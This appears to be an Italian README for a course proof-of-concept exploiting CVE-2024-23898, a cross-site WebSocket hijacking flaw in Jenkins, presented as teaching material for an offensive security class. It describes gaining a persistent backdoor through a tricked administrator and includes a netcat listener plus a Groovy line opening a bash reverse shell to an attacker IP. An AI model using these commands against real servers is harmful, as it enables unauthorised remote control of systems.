
Una prova di concetto di exploit di dirottamento WebSocket cross-site per CVE-2024-23898 — una vulnerabilità che colpisce le versioni di Jenkins 2.217-2.441. Per uso didattico nel corso Hacking & Offensive Security presso la Carnegie Mellon University.
Un exploit proof-of-concept di dirottamento WebSocket cross-site per CVE-2024-23898 — una vulnerabilità che interessa le versioni di Jenkins 2.217-2.441.
Questo exploit prende di mira la CLI di Jenkins, che può essere utilizzata per accedere e impartire comandi a un server di controllo Jenkins da remoto. Tramite questo exploit, un attaccante remoto può ottenere l'accesso e stabilire una backdoor persistente su un server di controllo Jenkins se un amministratore viene indotto a visitare un sito dannoso mentre è autenticato nel server di controllo Jenkins di destinazione.
Questo codice è inteso esclusivamente a scopo educativo e per l'uso esclusivo del corso Hacking & Offensive Security presso la Carnegie Mellon University. Questo codice non deve essere utilizzato come arma o altrimenti impiegato per creare malware. Gli autori condannano esplicitamente qualsiasi tentativo di farlo.
nc -l <port_num> (sostituisci <port_num> con un numero di porta inutilizzato)ipconfig getifaddr en0[http://localhost:8080/script](http://localhost:8080/script). Accedi con l'account amministratore se non lo hai già fatto.['bash', '-c', 'bash -i >& /dev/tcp/<attacker_ip>/<port_num> 0>&1'].execute()